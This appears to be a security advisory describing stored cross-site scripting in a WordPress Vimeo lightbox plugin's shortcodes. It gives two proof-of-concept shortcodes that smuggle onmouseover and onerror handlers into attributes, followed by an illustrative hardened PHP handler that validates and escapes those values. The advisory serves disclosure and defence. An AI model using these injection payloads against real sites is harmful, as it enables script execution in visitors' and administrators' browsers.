The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks.
[video_lightbox_vimeo5 video_id='"onmouseover=alert(/XSS/) b="' width="640" height="480" anchor="Click here to open vimeo video"]
[video_lightbox_vimeo5 video_id="13562192" width="640" height="480" anchor='http"onerror=alert(/XSS/)//']
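
The missing output escaping, shown as an added example of a hardened shortcode handler (this is not the plugin's own code). The handler name, the `example_video_lightbox` shortcode, the markup and the rule that an anchor starting with "http" is rendered as an image are assumptions made for illustration; the stand-in functions at the top are simplified versions of the WordPress ones so the file also runs from the command line.

```php
<?php
// Added example: hypothetical handler and shortcode name, not the plugin's code.
// Stand-ins so the file also runs outside WordPress (assumption: simplified;
// the real WordPress functions do more than these).
if (!function_exists('esc_attr')) {
    function esc_attr($s) { return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8'); }
    function esc_html($s) { return esc_attr($s); }
    function esc_url($s) { return preg_match('#^https?://#i', (string) $s) ? esc_attr($s) : ''; }
    function absint($n) { return abs((int) $n); }
    function shortcode_atts($defaults, $atts) {
        return array_merge($defaults, array_intersect_key((array) $atts, $defaults));
    }
}

function example_video_lightbox_shortcode($atts) {
    $a = shortcode_atts(
        array('video_id' => '', 'width' => '640', 'height' => '480', 'anchor' => ''),
        $atts
    );
    // A Vimeo ID is numeric: reject anything else instead of trying to clean it.
    if (!ctype_digit((string) $a['video_id'])) {
        return '';
    }
    // Dimensions are forced to non-negative integers before they reach the URL.
    $href = 'https://vimeo.com/' . $a['video_id']
          . '?width=' . absint($a['width']) . '&height=' . absint($a['height']);

    // Assumed rule: an anchor that starts with "http" is an image URL,
    // anything else is link text. Each is escaped for its own context.
    $src = (stripos($a['anchor'], 'http') === 0) ? esc_url($a['anchor']) : '';
    $inner = ($src !== '')
        ? '<img src="' . $src . '" alt="" />'
        : esc_html($a['anchor']);

    return '<a class="example-lightbox" href="' . esc_url($href) . '">' . $inner . '</a>';
}

if (function_exists('add_shortcode')) {
    add_shortcode('example_video_lightbox', 'example_video_lightbox_shortcode');
} elseif (PHP_SAPI === 'cli') {
    // The attribute values of the two shortcodes above, passed as parsed attributes.
    echo example_video_lightbox_shortcode(array(
        'video_id' => '"onmouseover=alert(/XSS/) b="',
        'anchor'   => 'Click here to open vimeo video',
    )), "\n";
    echo example_video_lightbox_shortcode(array(
        'video_id' => '13562192',
        'anchor'   => 'http"onerror=alert(/XSS/)//',
    )), "\n";
}
```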